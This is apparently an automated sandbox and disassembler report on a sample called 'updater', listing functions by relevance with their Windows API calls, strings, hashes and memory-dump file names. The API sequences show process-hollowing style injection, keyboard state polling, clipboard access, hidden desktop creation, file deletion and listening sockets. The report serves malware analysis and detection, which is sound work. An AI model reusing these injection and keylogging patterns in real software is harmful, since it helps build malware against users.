Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 5f519dc8f0b7c64c5335ef464b21f3a4883969b4427edd94aa31d8ccb0e4ff95
Instruction ID: d83caf2e176a50d0f4569faa3f53966f804bb234e59c59a919a071e71263b776
Opcode Fuzzy Hash: 5f519dc8f0b7c64c5335ef464b21f3a4883969b4427edd94aa31d8ccb0e4ff95
Instruction Fuzzy Hash: D1613875A40209FFDF00DFA5DC45BAEBB79FF05300F14822AE965A7290DB359A09DB60

Function 017C9841 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176sleepprocessnativeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,017C9A87), ref: 017C98A9
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 017C9976
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 017C998E
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 017C99B6
ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 017C99E5
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 017C9A37
ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 017C9A40
Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 017C9A4A
GetTickCount.KERNEL32 ref: 017C9A4F

Strings

D, xrefs: 017C9942

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
String ID: D
API String ID: 4190092080-2746444292
Opcode ID: 4c9d7fe392c687a49c916b3760c6f5ea6315de01b3fcc63776882931e0b5164d
Instruction ID: b672c32edd0da32d3c07ddf044261bca3dda0cfd3377f2f2c936c8b88c528ba1
Opcode Fuzzy Hash: 4c9d7fe392c687a49c916b3760c6f5ea6315de01b3fcc63776882931e0b5164d
Instruction Fuzzy Hash: D361C971A0010DAFDB40EFA8CC95FDEF7B9AF58704F544069F208E7248DB74AA858B61

Function 00C30A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3040D,?,?), ref: 00C31491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30B0C

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C30BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C30C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C30E82
RegCloseKey.ADVAPI32(00000000), ref: 00C30E8F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: cce57d14187d167c5d533446a1f4804881b3c6387bfb01150e4f6d672cd219cb
Instruction ID: ff5f1e334f9283d56f19d5ef11dab48f83927e4d36ab39277034859ae9b8b473
Opcode Fuzzy Hash: cce57d14187d167c5d533446a1f4804881b3c6387bfb01150e4f6d672cd219cb
Instruction Fuzzy Hash: 05E14D31214211AFC714DF29C891E6ABBE9FF89714F1489ADF49ADB262DB30ED01CB51

Function 00C10508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C10530
GetAsyncKeyState.USER32(000000A0), ref: 00C105B1
GetKeyState.USER32(000000A0), ref: 00C105CC
GetAsyncKeyState.USER32(000000A1), ref: 00C105E6
GetKeyState.USER32(000000A1), ref: 00C105FB
GetAsyncKeyState.USER32(00000011), ref: 00C10613
GetKeyState.USER32(00000011), ref: 00C10625
GetAsyncKeyState.USER32(00000012), ref: 00C1063D
GetKeyState.USER32(00000012), ref: 00C1064F
GetAsyncKeyState.USER32(0000005B), ref: 00C10667
GetKeyState.USER32(0000005B), ref: 00C10679

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 07319e2b685fcfe67363210fcf86971c35115dfb31485ee5e46e6426a4f1a4f1
Instruction ID: 915106135c1daeea5fda1f2206384eec71fdf627e56c70b9d3997bcf2f3b24b4
Opcode Fuzzy Hash: 07319e2b685fcfe67363210fcf86971c35115dfb31485ee5e46e6426a4f1a4f1
Instruction Fuzzy Hash: F141E8745447C96DFF30866488043F5BEA1BB53304F28405EEAD5461C2EBE49BE4DF96

Function 00C1443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C14451
__swprintf.LIBCMT ref: 00C1445E

Part of subcall function 00BD38C8: __woutput_l.LIBCMT ref: 00BD3921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C14488
LoadResource.KERNEL32(?,00000000), ref: 00C14494
LockResource.KERNEL32(00000000), ref: 00C144A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00C144C1
LoadResource.KERNEL32(?,00000000), ref: 00C144D3
SizeofResource.KERNEL32(?,00000000), ref: 00C144E2
LockResource.KERNEL32(?), ref: 00C144EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C1454F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 50eab523d6547ef0f27d7054184a59d433a34c01ec52a5d135c013d7974abf6f
Instruction ID: e898e43b39a2baa1814db0429d7e4ac260566b9a6fb4439fd09fcd5714a31ee2
Opcode Fuzzy Hash: 50eab523d6547ef0f27d7054184a59d433a34c01ec52a5d135c013d7974abf6f
Instruction Fuzzy Hash: F631E17550121AABDB199FB0EC48BFF7BA9FF06301F104415FA16D2151E770DA90EB60

Function 00C24830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C24857
EmptyClipboard.USER32 ref: 00C2485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00C24872
CloseClipboard.USER32 ref: 00C24911

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f43195f547cc1640ce216f5a4dde31deed2c59e8942cbf4cc1400c282b21f9d8
Instruction ID: 2731d1f6315126df55b3fc993f53416b5d13dd819f64497d80c925e0b25d54e3
Opcode Fuzzy Hash: f43195f547cc1640ce216f5a4dde31deed2c59e8942cbf4cc1400c282b21f9d8
Instruction Fuzzy Hash: CC21C135245220DFDB15AF24EC09B6E77A8FF45721F118059FE0ADB2A2DBB0AD50CB94

Function 00C13CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC2A58,?,00008000), ref: 00BD02A4

Part of subcall function 00C14FEC: GetFileAttributesW.KERNEL32(?,00C13BFE), ref: 00C14FED

FindFirstFileW.KERNEL32(?,?), ref: 00C13D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C13E3E
MoveFileW.KERNEL32(?,?), ref: 00C13E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C13E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C13E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C13EAC

Strings

\*.*, xrefs: 00C13D41, 00C13D4A, 00C13D5F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: fe0765a0c148a0cf7a0f5bd5ac01691c390f5da148c0869b9a3d79851a84e618
Instruction ID: 5ae8f3834899a0a26e2c0bb9129a849a416750e5983c89c615a45821a96e24eb
Opcode Fuzzy Hash: fe0765a0c148a0cf7a0f5bd5ac01691c390f5da148c0869b9a3d79851a84e618
Instruction Fuzzy Hash: 2951A23180124DAACF15EBA4C992EEDB7B9AF12304F2045A9E451B7192EF316F49DB60

Function 017C63B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 017C6483
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,017C65B2), ref: 017C64C4
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 017C6501
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,017C65B2), ref: 017C653A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 017C6572
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,017C65B2), ref: 017C6585

Strings

D, xrefs: 017C6454

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Create$Process$DesktopObjectSingleWait
String ID: D
API String ID: 183768610-2746444292
Opcode ID: e1f2a86dc1f9d243074df561147b0f8266671fd5c2e934e5088a838c3a07f9a9
Instruction ID: 4b622eff2234ecee3cc26b27d804a88ba297cf55980c8460fa42c9537e813078
Opcode Fuzzy Hash: e1f2a86dc1f9d243074df561147b0f8266671fd5c2e934e5088a838c3a07f9a9
Instruction Fuzzy Hash: B2512B70A4030EAEEB10EF94DCD9FDEF7B9AF14710F604129B514AB298D770AA458B54

Function 00C1FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C1FA83
FindClose.KERNEL32(00000000), ref: 00C1FB96

Part of subcall function 00BB52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB52E6

Sleep.KERNEL32(0000000A), ref: 00C1FAB3
_wcscmp.LIBCMT ref: 00C1FAC7
_wcscmp.LIBCMT ref: 00C1FAE2
FindNextFileW.KERNEL32(?,?), ref: 00C1FB80

Strings

*.*, xrefs: 00C1FA68

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: af041a800fdda1d3e10c08944868851e1fc0cbefa468e674cc7e546c71198147
Instruction ID: d0bd59d6b0121748903b71da18d247fe8d5acbe646e768db8d86f42cabc975b5
Opcode Fuzzy Hash: af041a800fdda1d3e10c08944868851e1fc0cbefa468e674cc7e546c71198147
Instruction Fuzzy Hash: AD4181B194421A9FCF14DF64CC55BEEBBB4FF06350F1445AAF814A2291EB309E85DB50

Function 00C14005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC2A58,?,00008000), ref: 00BD02A4

Part of subcall function 00C14FEC: GetFileAttributesW.KERNEL32(?,00C13BFE), ref: 00C14FED

FindFirstFileW.KERNEL32(?,?), ref: 00C1407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C140CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C140DD
FindClose.KERNEL32(00000000), ref: 00C140F4
FindClose.KERNEL32(00000000), ref: 00C140FD

Strings

\*.*, xrefs: 00C1404E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 711d0326e88f57c9b003c22ee84f7a9bdec98831bfa41d7c2db69651ce507116
Instruction ID: 5851f690012ee6ded6edc52845330358c574f8b63cc3103034172aa83c046589
Opcode Fuzzy Hash: 711d0326e88f57c9b003c22ee84f7a9bdec98831bfa41d7c2db69651ce507116
Instruction Fuzzy Hash: 91319C310083859BC214EF64C895EEFB7E8BE97304F404E6DF5E192192EB30DA49D762

Function 00C15778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C09399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C093E3
Part of subcall function 00C09399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C09410
Part of subcall function 00C09399: GetLastError.KERNEL32 ref: 00C0941D

ExitWindowsEx.USER32(?,00000000), ref: 00C157B4

Strings

, xrefs: 00C157A2
@, xrefs: 00C157A7
SeShutdownPrivilege, xrefs: 00C15784

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: f7e5dea218adb8dd9bb80401282530290f8d7e7aadedfeba5b63a633b3c1db9f
Instruction ID: 5dce2c86fd907f3518a9ef6d36f47729fc513c6e40270ea8bc8d106c060cfef0
Opcode Fuzzy Hash: f7e5dea218adb8dd9bb80401282530290f8d7e7aadedfeba5b63a633b3c1db9f
Instruction Fuzzy Hash: E001FC317B0712EAE7286265DC8BBFF7658EB47740F240129F923D20D2D9505C80A1E0

Function 017C9199 Relevance: 9.2, Strings: 7, Instructions: 450COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 017C949F, 017C94A2
ReadProcessMemory, xrefs: 017C94BB, 017C94C1
CloseHandle, xrefs: 017C94CB, 017C94D1
GetP, xrefs: 017C92AB
OpenProcess, xrefs: 017C94AB, 017C94B1
LoadLibraryA, xrefs: 017C948F, 017C9495
ddre, xrefs: 017C92B6

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction ID: 4c605013ced2ce485545422b8438ad75e2bca0213d4780f34eac15d035a7a5d9
Opcode Fuzzy Hash: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction Fuzzy Hash: 2C221570E04298DFDB11CBACC884B9EBBF5AF19704F184099E588AB352C375AE54CF65

Function 017C9192 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 017C949F, 017C94A2
ReadProcessMemory, xrefs: 017C94BB, 017C94C1
CloseHandle, xrefs: 017C94CB, 017C94D1
GetP, xrefs: 017C92AB
OpenProcess, xrefs: 017C94AB, 017C94B1
LoadLibraryA, xrefs: 017C948F, 017C9495
ddre, xrefs: 017C92B6

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: 8761c1441d80b0c638c46b68a25fd0d52c3e53e41ba7f9e423dcd3561e0af36d
Instruction ID: 63ba8a23506a1a6af9e5c307c2d012a0e9e8a8ca739958445501c4137c926a15
Opcode Fuzzy Hash: 8761c1441d80b0c638c46b68a25fd0d52c3e53e41ba7f9e423dcd3561e0af36d
Instruction Fuzzy Hash: 34022B70E08298DFEB11CBACC885B9DBBF5AF19704F184099E588AB342C3759E54CF65

Function 00C2696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C269C7
WSAGetLastError.WSOCK32(00000000), ref: 00C269D6
bind.WSOCK32(00000000,?,00000010), ref: 00C269F2
listen.WSOCK32(00000000,00000005), ref: 00C26A01
WSAGetLastError.WSOCK32(00000000), ref: 00C26A1B
closesocket.WSOCK32(00000000,00000000), ref: 00C26A2F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0241a742c330b5a9abdc3c89636359cd2fffb8ca36550cbfd5314469fde1b482
Instruction ID: ef415e49e93e3b42eddf47848b53b12901f2832a2f31594286406e4ec37a3e18
Opcode Fuzzy Hash: 0241a742c330b5a9abdc3c89636359cd2fffb8ca36550cbfd5314469fde1b482
Instruction Fuzzy Hash: 4921F2342006109FCB10EF68D889B6EB7F9FF45720F108598E916A73D2CB70AD00DBA1

Function 00C1C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C1C329
_wcscmp.LIBCMT ref: 00C1C359
_wcscmp.LIBCMT ref: 00C1C36E
FindNextFileW.KERNEL32(00000000,?), ref: 00C1C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C1C3AF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 3577cee9296bcd43a0be187f09419df9c28fa0f6221ef6dde2d4dfeec574ad5e
Instruction ID: 6c6fffe24cf29f8be15d30db98af523700b99674ed889d7dc1fe294c057221e6
Opcode Fuzzy Hash: 3577cee9296bcd43a0be187f09419df9c28fa0f6221ef6dde2d4dfeec574ad5e
Instruction Fuzzy Hash: 76517A756446029FC714DF68C4D0EEAB3E8BF4A310F10466DF9668B3A2DB70AD44DB91

Function 00C26E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C28475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C284A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C26E89
WSAGetLastError.WSOCK32(00000000), ref: 00C26EB2
bind.WSOCK32(00000000,?,00000010), ref: 00C26EEB
WSAGetLastError.WSOCK32(00000000), ref: 00C26EF8
closesocket.WSOCK32(00000000,00000000), ref: 00C26F0C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 3c14503cfae05b0a8b361c3f13f4c86871ccd150af24de4d887963ee4e556936
Instruction ID: 6b1e20aa65e22cef1f44730d62001b0fdcc4bcb42d57b0b4da8df77f1e494690
Opcode Fuzzy Hash: 3c14503cfae05b0a8b361c3f13f4c86871ccd150af24de4d887963ee4e556936
Instruction Fuzzy Hash: 8E41D475640610AFDB10AF64DC86FBE77E8AF04714F048598FA55AB3D3DBB09D008BA1

Function 00C359B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C35A02
IsWindowEnabled.USER32 ref: 00C35A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00C35A1D
IsIconic.USER32 ref: 00C35A2B
IsZoomed.USER32 ref: 00C35A39

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
